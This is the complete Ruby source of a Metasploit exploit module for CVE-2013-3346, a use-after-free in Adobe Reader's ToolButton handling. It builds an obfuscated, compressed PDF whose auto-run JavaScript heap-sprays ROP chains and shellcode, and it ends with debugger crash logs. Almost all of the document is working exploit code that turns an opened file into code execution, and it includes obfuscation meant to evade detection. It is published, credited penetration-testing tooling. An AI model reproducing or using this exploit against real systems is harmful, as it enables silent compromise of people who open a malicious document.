Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::FILEFORMAT
10
  include Msf::Exploit::RopDb
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Adobe Reader ToolButton Use After Free',
15
      'Description'    => %q{
16
        This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6
17
        and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
18
        the cEnable callback can be used to early free the object memory. Later use of the object
19
        allows triggering the use after free condition. This module has been tested successfully
20
        on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in
21
        November, 2013.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Soroush Dalili', # Vulnerability discovery
27
          'Unknown', # Exploit in the wild
28
          'sinn3r', # Metasploit module
29
          'juan vazquez' # Metasploit module
30
        ],
31
      'References'     =>
32
        [
33
          [ 'CVE', '2013-3346' ],
34
          [ 'OSVDB', '96745' ],
35
          [ 'ZDI', '13-212' ],
36
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
37
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
38
        ],
39
      'Payload'        =>
40
        {
41
          'Space'    => 1024,
42
          'BadChars' => "\x00",
43
          'DisableNops' => true
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [ 'Windows XP / Adobe Reader 9/10/11', { }],
49
        ],
50
      'Privileged'     => false,
51
      'DisclosureDate' => '2013-08-08',
52
      'DefaultTarget'  => 0))
53

54
    register_options(
55
      [
56
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
57
      ])
58
  end
59

60
  def exploit
61
    js_data = make_js
62

63
    # Create the pdf
64
    pdf = make_pdf(js_data)
65

66
    print_status("Creating '#{datastore['FILENAME']}' file...")
67

68
    file_create(pdf)
69
  end
70

71

72
  def make_js
73

74
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain
75
    rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' }))
76
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
77
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
78
    escaped_payload = Rex::Text.to_unescape(payload.encoded)
79

80
    js = %Q|
81
function heapSpray(str, str_addr, r_addr) {
82
  var aaa = unescape("%u0c0c");
83
  aaa += aaa;
84
  while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
85
  var i1 = r_addr - 0x24;
86
  var bbb = aaa.substring(0, i1 / 2);
87
  var sa = str_addr;
88
  while (sa.length < (0x0c0c - r_addr)) sa += sa;
89
  bbb += sa;
90
  bbb += aaa;
91
  var i11 = 0x0c0c - 0x24;
92
  bbb = bbb.substring(0, i11 / 2);
93
  bbb += str;
94
  bbb += aaa;
95
  var i2 = 0x4000 + 0xc000;
96
  var ccc = bbb.substring(0, i2 / 2);
97
  while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
98
  var i3 = (0x1020 - 0x08) / 2;
99
  var ddd = ccc.substring(0, 0x80000 - i3);
100
  var eee = new Array();
101
  for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
102
  return;
103
}
104
var shellcode = unescape("#{escaped_payload}");
105
var executable = "";
106
var rop9 = unescape("#{rop_9}");
107
var rop10 = unescape("#{rop_10}");
108
var rop11 = unescape("#{rop_11}");
109
var r11 = false;
110
var vulnerable = true;
111

112
var obj_size;
113
var rop;
114
var ret_addr;
115
var rop_addr;
116
var r_addr;
117

118
if (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
119
  obj_size = 0x330 + 0x1c;
120
  rop = rop9;
121
  ret_addr = unescape("%ua83e%u4a82");
122
  rop_addr = unescape("%u08e8%u0c0c");
123
  r_addr = 0x08e8;
124
} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
125
  obj_size = 0x360 + 0x1c;
126
  rop = rop10;
127
  rop_addr = unescape("%u08e4%u0c0c");
128
  r_addr = 0x08e4;
129
  ret_addr = unescape("%ua8df%u4a82");
130
} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
131
  r11 = true;
132
  obj_size = 0x370;
133
  rop = rop11;
134
  rop_addr = unescape("%u08a8%u0c0c");
135
  r_addr = 0x08a8;
136
  ret_addr = unescape("%u8003%u4a84");
137
} else {
138
  vulnerable = false;
139
}
140

141
if (vulnerable) {
142
  var payload = rop + shellcode;
143
  heapSpray(payload, ret_addr, r_addr);
144

145
  var part1 = "";
146
  if (!r11) {
147
    for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
148
  }
149
  part1 += rop_addr;
150
  var part2 = "";
151
  var part2_len = obj_size - part1.length * 2;
152
  for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");
153
  var arr = new Array();
154

155
  removeButtonFunc = function () {
156
    app.removeToolButton({
157
        cName: "evil"
158
    });
159

160
    for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
161
  }
162

163
  addButtonFunc = function () {
164
    app.addToolButton({
165
      cName: "xxx",
166
      cExec: "1",
167
      cEnable: "removeButtonFunc();"
168
    });
169
  }
170

171
  app.addToolButton({
172
    cName: "evil",
173
    cExec: "1",
174
    cEnable: "addButtonFunc();"
175
  });
176
}
177
|
178

179
    js
180
  end
181

182
  def random_non_ascii_string(count)
183
    result = ""
184
    count.times do
185
      result << (rand(128) + 128).chr
186
    end
187
    result
188
  end
189

190
  def io_def(id)
191
    "%d 0 obj \n" % id
192
  end
193

194
  def io_ref(id)
195
    "%d 0 R" % id
196
  end
197

198

199
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
200
  def n_obfu(str)
201
    #return str
202
    result = ""
203
    str.scan(/./u) do |c|
204
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
205
        result << "#%x" % c.unpack("C*")[0]
206
      else
207
        result << c
208
      end
209
    end
210
    result
211
  end
212

213

214
  def ascii_hex_whitespace_encode(str)
215
    result = ""
216
    whitespace = ""
217
    str.each_byte do |b|
218
      result << whitespace << "%02x" % b
219
      whitespace = " " * (rand(3) + 1)
220
    end
221
    result << ">"
222
  end
223

224

225
  def make_pdf(js)
226
    xref = []
227
    eol = "\n"
228
    endobj = "endobj" << eol
229

230
    # Randomize PDF version?
231
    pdf = "%PDF-1.5" << eol
232
    pdf << "%" << random_non_ascii_string(4) << eol
233

234
    # catalog
235
    xref << pdf.length
236
    pdf << io_def(1) << n_obfu("<<") << eol
237
    pdf << n_obfu("/Pages ") << io_ref(2) << eol
238
    pdf << n_obfu("/Type /Catalog") << eol
239
    pdf << n_obfu("/OpenAction ") << io_ref(4) << eol
240
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
241
    pdf << n_obfu("/AcroForm ") << io_ref(6) << eol
242
    pdf << n_obfu(">>") << eol
243
    pdf << endobj
244

245
    # pages array
246
    xref << pdf.length
247
    pdf << io_def(2) << n_obfu("<<") << eol
248
    pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol
249
    pdf << n_obfu("/Count 1") << eol
250
    pdf << n_obfu("/Type /Pages") << eol
251
    pdf << n_obfu(">>") << eol
252
    pdf << endobj
253

254
    # page 1
255
    xref << pdf.length
256
    pdf << io_def(3) << n_obfu("<<") << eol
257
    pdf << n_obfu("/Parent ") << io_ref(2) << eol
258
    pdf << n_obfu("/Type /Page") << eol
259
    pdf << n_obfu(">>") << eol # end obj dict
260
    pdf << endobj
261

262
    # js action
263
    xref << pdf.length
264
    pdf << io_def(4) << n_obfu("<<")
265
    pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)
266
    pdf << n_obfu(">>") << eol
267
    pdf << endobj
268

269
    # js stream
270
    xref << pdf.length
271
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
272
    pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
273
    pdf << "stream" << eol
274
    pdf << compressed << eol
275
    pdf << "endstream" << eol
276
    pdf << endobj
277

278
    ###
279
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
280
    ###
281

282
    # form object
283
    xref << pdf.length
284
    pdf << io_def(6)
285
    pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol
286
    pdf << endobj
287

288
    # form stream
289
    xfa = <<-EOF
290
<?xml version="1.0" encoding="UTF-8"?>
291
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
292
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
293
<present><pdf><interactive>1</interactive></pdf></present>
294
</config>
295
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
296
<subform name="form1" layout="tb" locale="en_US">
297
<pageSet></pageSet>
298
</subform></template></xdp:xdp>
299
EOF
300

301
    xref << pdf.length
302
    pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.length) << eol
303
    pdf << "stream" << eol
304
    pdf << xfa << eol
305
    pdf << "endstream" << eol
306
    pdf << endobj
307

308
    ###
309
    # end form stuff for icucnv36.dll / icucnv40.dll
310
    ###
311

312

313
    # trailing stuff
314
    xrefPosition = pdf.length
315
    pdf << "xref" << eol
316
    pdf << "0 %d" % (xref.length + 1) << eol
317
    pdf << "0000000000 65535 f" << eol
318
    xref.each do |index|
319
      pdf << "%010d 00000 n" % index << eol
320
    end
321

322
    pdf << "trailer" << eol
323
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
324

325
    pdf << "startxref" << eol
326
    pdf << xrefPosition.to_s() << eol
327

328
    pdf << "%%EOF" << eol
329
    pdf
330
  end
331
end
332

333

334
=begin
335

336
* crash Adobe Reader 10.1.4
337

338
First chance exceptions are reported before any exception handling.
339
This exception may be expected and handled.
340
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
341
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0         nv up ei pl nz ac po cy
342
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213
343
AcroRd32_60000000!PDFLTerm+0xbb7cd:
344
604d3a4d ff9028030000    call    dword ptr [eax+328h] ds:0023:0c0c0c0c=????????
345

346
* crash Adobe Reader 11.0.2
347

348
(940.d70): Access violation - code c0000005 (first chance)
349
First chance exceptions are reported before any exception handling.
350
This exception may be expected and handled.
351
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
352
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
353
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0         nv up ei pl nz ac po cy
354
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210213
355
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
356
60197b9b ff9064030000    call    dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
357

358
=end
359

360